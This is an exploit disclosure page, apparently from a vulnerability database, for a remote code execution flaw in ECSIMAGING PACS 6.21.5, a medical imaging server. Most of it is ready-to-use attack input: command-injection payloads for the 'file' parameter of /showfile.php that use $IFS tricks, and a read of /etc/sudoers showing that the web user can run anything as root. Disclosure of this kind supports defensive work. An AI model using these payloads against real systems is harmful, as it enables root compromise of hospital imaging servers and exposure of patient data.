ECSIMAGING PACS 6.21.5 Remote Code Execution

2021.01.08
Credit: shoxxdj
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution # Date: 06/01/2021 # Exploit Author: shoxxdj # Vendor Homepage: https://www.medicalexpo.fr/ # Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 ) # Tested on: Linux ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access : /showfile.php?file=/etc/sudoers [...] www-data ALL=NOPASSWD: ALL [...] Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/ /showfile.php?file=;sudo$IFS-l [...] User www-data may run the following commands on this host: (root) NOPASSWD: ALL [...]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top